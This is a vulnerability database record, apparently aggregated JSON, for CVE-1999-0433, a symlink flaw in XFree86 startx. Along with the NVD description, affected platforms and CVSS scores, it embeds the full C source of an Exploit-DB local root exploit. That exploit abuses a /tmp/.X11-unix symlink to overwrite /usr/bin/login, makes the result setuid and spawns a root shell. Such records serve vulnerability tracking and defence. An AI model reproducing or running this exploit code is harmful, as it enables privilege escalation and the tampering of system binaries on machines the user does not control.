ID CVE-1999-0433 Type cve Reporter NVD Modified 2008-09-09T08:34:31
Description
XFree86 startx command is vulnerable to a symlink attack, allowing local users to create files in restricted directories, possibly allowing them to gain privileges or cause a denial of service.
{"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0433", "history": [], "references": [], "lastseen": "2016-09-03T02:13:59", "bulletinFamily": "NVD", "title": "CVE-1999-0433", "cpe": ["cpe:/o:redhat:linux:5.1", "cpe:/o:slackware:slackware_linux:3.3", "cpe:/o:netbsd:netbsd:1.3.2", "cpe:/o:slackware:slackware_linux:3.6", "cpe:/o:slackware:slackware_linux:4.0", "cpe:/o:slackware:slackware_linux:3.5", "cpe:/o:redhat:linux:5.2::i386", "cpe:/a:xfree86_project:x11r6:3.3.3", "cpe:/o:slackware:slackware_linux:3.4", "cpe:/o:netbsd:netbsd:1.3.3", "cpe:/o:suse:suse_linux:5.2", "cpe:/o:suse:suse_linux:6.1", "cpe:/o:suse:suse_linux:5.1", "cpe:/o:suse:suse_linux:6.0"], "viewCount": 4, "id": "CVE-1999-0433", "hash": "2264afc596ef7bb8c6052a96d5f9cc5c26925aa8e0988e5bbb79900cb431591c", "description": "XFree86 startx command is vulnerable to a symlink attack, allowing local users to create files in restricted directories, possibly allowing them to gain privileges or cause a denial of service.", "edition": 1, "assessment": {"name": "", "href": "", "system": ""}, "cvelist": ["CVE-1999-0433"], "scanner": [], "modified": "2008-09-09T08:34:31", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "objectVersion": "1.2", "reporter": "NVD", "type": "cve", "published": "1999-03-21T00:00:00", "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-09-03T02:13:59"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:19257"]}, {"type": "osvdb", "idList": ["OSVDB:975"]}], "modified": "2016-09-03T02:13:59"}, "vulnersScore": 7.2}}
{"exploitdb": [{"lastseen": "2016-02-02T11:24:33", "bulletinFamily": "exploit", "description": "X11R6 3.3.3 Symlink Vulnerability. CVE-1999-0433. Local exploit for linux platform", "modified": "1999-03-21T00:00:00", "published": "1999-03-21T00:00:00", "id": "EDB-ID:19257", "href": "https://www.exploit-db.com/exploits/19257/", "type": "exploitdb", "title": "X11R6 3.3.3 Symlink Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/326/info\r\n\r\nThere is a symlink vulnerability known to exist under most modern linux and NetBSD distributions. It involves /tmp/.X11-unix and the tendency to follow to/overwrite the file pointed to if a symlink. It may be possible for a regular user to write arbritrary data to a file they normally have no write access to resulting in a root compromise. \r\n\r\n/*** local XFree 3.3.3-symlink root-compromise.\r\n *** Tested under FreeBSD 3.1 (but should work on others 2)\r\n *** (C) 1999/2000 by Stealthf0rk for the K.A.L.U.G. \r\n *** (check out http://www.kalug.lug.net/stealth or /coding for\r\n *** other kewl stuff!)\r\n ***\r\n *** FOR EDUCATIONAL PURPOSES ONLY!!! USE IT AT YOUR OWN RISK.\r\n *** Even if this program restores all, you should backup your\r\n *** login before running this.\r\n ***/\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n\r\n#define LOGIN \"/usr/bin/login\"\r\n#define TELNET \"/usr/bin/telnet\"\r\n\r\nint cp(const char*, const char*, int);\r\n\r\nint main(int argc, char **argv)\r\n{\r\n\r\n\tchar *telnet[] = {TELNET, \"localhost\", NULL};\r\n\tchar *shell[] = {\"/bin/sh\", NULL};\r\n\tchar *X[] = {\"/usr/X11R6/bin/xinit\", NULL};\r\n\tFILE *f = NULL;\r\n\tint p = 0;\r\n\tchar buf[1000] = {0};\r\n\r\n\t/* the rootshell */\r\n\tif (!geteuid() || !getuid()) {\r\n\t\tunlink(LOGIN);\r\n\t\tcp(\"/tmp/L\", LOGIN, 1);\r\n\t\tchmod(LOGIN, 04555);\r\n\t\tprintf(\"Welcome!\\n\");\r\n\t\tunlink(\"/tmp/.X11-unix\");\r\n\t\tunlink(\"/tmp/L\");\r\n\t\texecve(*shell, shell, NULL);\r\n\t}\r\n\t\r\n\t/* back up */\r\n\tcp(LOGIN, \"/tmp/L\", 1);\r\n\tif (symlink(LOGIN, \"/tmp/.X11-unix\") < 0) {\r\n\t\tperror(\"symlink (/tmp/.X11-unix)\");\r\n\t\texit(errno);\r\n\t}\r\n\tif ((p = fork()) < 0) {\r\n\t\tperror(\"fork\");\r\n\t\texit(errno);\r\n\t} else if (p > 0) {\r\n\t\tsleep(7);\r\n\t\tkill(p, 9);\r\n\t\tcp(argv[0], LOGIN, 1);\r\n\t\texecve(telnet[0], telnet, NULL);\r\n\t\tperror(\"fatal:\");\r\n\t} else {\r\n\t\tprintf(\"Xfree 3.3.3 root-sploit by Stealth. http://www.kalug.lug.net\\n\");\r\n\t\tprintf(\"\\n-> Please give me some seconds... <-\\n\\n\");\r\n\t\texecve(X[0], X, NULL);\r\n\t}\r\n\treturn 0;\r\n}\r\n\t\r\n\t\r\nint cp(const char *from, const char *to, int how)\r\n{\r\n\tint in = 0, out = 0, r = 0;\r\n\tchar buf[1000] = {0};\r\n\t\r\n\r\n\tprintf(\"cp %s %s\\n\", from, to);\r\n\t/* overwrite ? */\r\n\tif (how == 1) \r\n\t\thow = O_RDWR|O_TRUNC|O_CREAT;\r\n\telse\r\n\t\thow = O_RDWR|O_CREAT;\r\n\r\n if ((out = open(to, how)) < 0) {\r\n\t\tperror(\"open 1\");\r\n\t\texit(errno);\r\n\t}\r\n\tif ((in = open(from, O_RDONLY)) < 0) {\r\n\t\tperror(\"open 2\");\r\n\t\texit(errno);\r\n\t}\r\n\twhile ((r = read(in, buf, 1000-1)) > 0) {\r\n\t\twrite(out,buf,r);\r\n\t\tmemset(buf,0,1000);\r\n\t}\r\n\tclose(in); close(out);\r\n\treturn 0;\r\n}\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19257/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 2032\n[CVE-1999-0433](https://vulners.com/cve/CVE-1999-0433)\nBugtraq ID: 326\n", "modified": "1999-03-28T00:00:00", "published": "1999-03-28T00:00:00", "id": "OSVDB:975", "href": "https://vulners.com/osvdb/OSVDB:975", "title": "X11R6 startx Symlink Arbitrary File Creation", "type": "osvdb", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
